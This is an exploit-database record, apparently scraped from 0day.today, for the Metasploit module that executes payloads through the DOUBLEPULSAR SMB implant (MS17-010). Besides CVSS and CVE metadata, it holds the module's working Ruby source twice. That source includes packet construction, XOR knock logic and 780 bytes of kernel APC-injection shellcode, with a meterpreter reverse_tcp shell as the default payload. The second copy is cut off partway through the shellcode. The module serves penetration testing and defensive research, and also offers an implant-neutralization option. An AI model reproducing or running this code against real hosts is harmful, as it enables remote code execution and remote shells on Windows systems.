pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack(\"S<\")\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" +\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" +\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" +\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" +\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" +\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" +\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" +\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" +\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" +\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" +\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" +\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" +\r\n \"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" +\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" +\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" +\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" +\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" +\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" +\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" +\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" +\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" +\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" +\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" +\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" +\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" +\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" +\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" +\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" +\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" +\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" +\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" +\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" +\r\n \"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" +\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" +\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" +\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" +\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" +\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" +\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" +\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" +\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" +\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" +\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" +\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" +\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" +\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" +\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" +\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-10-18] #"}, "lastseen": "2021-10-18T18:18:17", "differentElements": ["sourceData"], "edition": 48}, {"bulletin": {"id": "1337DAY-ID-33313", "vendorId": null, "hash": "2bc5147a26be639f4873566c26445e1f", "type": "zdt", "bulletinFamily": "exploit", "title": "DOUBLEPULSAR - Payload Execution and Neutralization Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2019-10-04T00:00:00", "modified": "2019-10-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33313", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0148", "CVE-2017-0145", "CVE-2017-0147", "CVE-2017-0144"], "immutableFields": [], "lastseen": "2021-10-18T22:17:39", "history": [], "viewCount": 94, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:43970", "EDB-ID:41987", "EDB-ID:47456"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-29702", "1337DAY-ID-27752", "1337DAY-ID-33895", "1337DAY-ID-27802", "1337DAY-ID-27786"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "700059.PRM", "700099.PRM", "MS17-010.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:146236"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0145/"]}, {"type": "seebug", "idList": ["SSV:92964", "SSV:92952"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0148", "CVE-2017-0144", "CVE-2017-0147", "CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0143"]}, {"type": "symantec", "idList": ["SMNTC-96707", "SMNTC-96709", "SMNTC-96706", "SMNTC-96704", "SMNTC-96705", "SMNTC-96703"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "threatpost", "idList": ["THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41"]}, {"type": "mmpc", "idList": ["MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0145", "MS:CVE-2017-0144", "MS:CVE-2017-0143", "MS:CVE-2017-0148"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-10-18T22:17:39", "rev": 2}, "score": {"value": 7.7, "vector": "NONE", "modified": "2021-10-18T22:17:39", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33313", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'DOUBLEPULSAR Payload Execution and Neutralization',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14',\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload', {}],\r\n ['Neutralize implant', {}]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n },\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_SAFE],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack('V').first\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n vprint_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n vprint_good(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n vprint_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n vprint_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << Rex::Text.rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack(\"S<\")\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" +\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" +\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" +\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" +\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" +\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" +\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" +\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" +\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" +\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" +\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" +\r\n 